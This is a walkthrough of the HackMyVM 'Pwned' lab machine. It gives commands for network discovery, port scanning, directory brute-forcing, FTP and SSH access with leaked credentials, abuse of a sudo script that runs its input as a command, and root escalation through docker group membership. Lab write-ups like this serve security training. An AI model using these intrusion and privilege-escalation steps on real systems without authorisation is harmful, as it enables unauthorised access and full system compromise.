Writeup of Pwned HackMyVM – Walkthrough

I am currently doing both old and new machines from HackMyVM. Pwned is the second machine from the HackMyVM platform. In this post, I will try to explain everything in detail. Furthermore, this machine works on VirtualBox. “Writeup of Pwned HackMyVM – Walkthrough”

Link to the machine: https://hackmyvm.eu/machines/machine.php?vm=Pwned

Identify the target

Firstly, I had to identify the IP address of the target. This is basically the first step in every local VM.

sudo netdiscover -r 10.0.0.0/24
The IP address of the target is 10.0.0.18

Scan open ports

Next, I scanned the open ports to get the information on the exposed services on the network.

nmap -v -T4 -p- -sC -sV -oN nmap.log 10.0.0.18

Nmap scan results

From the nmap scan results, we know that the Linux distro is Debian. Similarly, there is an FTP, an SSH and an HTTP port open. Also, it didn’t list files of the FTP server. This means that we cannot access the server anonymously. Therefore, my next step would be checking the HTTP server.

Enumerate the HTTP server

The default page and its source weren’t much help. Therefore, I decided to bruteforce the paths.

ffuf -c -ic -r -u http://10.0.0.18/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e .php,.html,.txt -of html -o dir.html

ffuf scan results

There is a path /nothing that has nothing in it. However, on the path “/hidden_text”, there is a wordlist.

Wordlist of paths

There is a wordlist of paths that I can bruteforce once again.

ffuf -c -ic -r -u http://10.0.0.18FUZZ -w secret.dic -of html -o dir-secret.html 

/pwned.vuln is a path in the target
Login form in /pwned.vuln

We see a login form on the target. However, there is an HTML comment in the source that gives us the credentials of the FTP user.

The source of the page contains the username and the password of the FTP server
lftp -u ftpuser 10.0.0.18
The FTP server

There is a directory that contains a note and a supposed private key. Thus, I downloaded these files to my local machine.

Then, I checked the note.txt file.

Note.txt content

From the note, I got a possible username as “ariana”. Then, using the private key, I logged in as the user.

chmod 600 id_rsa
ssh ariana@10.0.0.18 -i id_rsa
SSH shell of ariana

User privilege escalation

Next, I checked the sudo permissions of the user ariana.

sudo -l
Sudo permissions of ariana

There is a script that the user can execute as the user selena. Let’s see the content of the script if it allows.

cat /home/messenger.sh
Content of messenger.sh

We can see that the input of the message, is directly called the command. Plus, the errors are redirected to /dev/null. Hence, I can use “bash” to get the bash shell. Then, I could spawn a tty shell.

sudo -u selena /home/messenger.sh
Got the shell of selena
python3 -c 'import pty;pty.spawn("/bin/bash")'
The proper shell of selena

We can see above that the user belongs to the group docker. Fortunately, this can escalate the privilege to root.

Reference: https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#docker-group

docker image list
docker run -it --rm -v /:/mnt alpine chroot /mnt bash
In the root shell of the container

Basically, what I did in the command is I opened an interactive terminal of “bash” on the image alpine. However, I also mounted the root file system of the host to the /mnt directory. Next, I changed the root to /mnt. Since the directory structure of the host and the container is the same, this gives us “effective” access to the container. As we can see the “root” user belongs to the container host “12cccac77f6c” and not the host “pwned”. But since we have mounted the file system and changed the root to /mnt, we will see the directory structure as that of the host machine. Also, the current root has full access to the container. So, we can execute the commands as the container’s root user. But, we will see effective changes in the host. If you try removing the text “chroot /mnt” from the command, you will see the file system of the container. Then, if you go inside /mnt, you will see the file system of the host.

Check my walkthrough of Driftingblues 7

0 0 votes
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
0
Would love your thoughts, please comment.x
()
x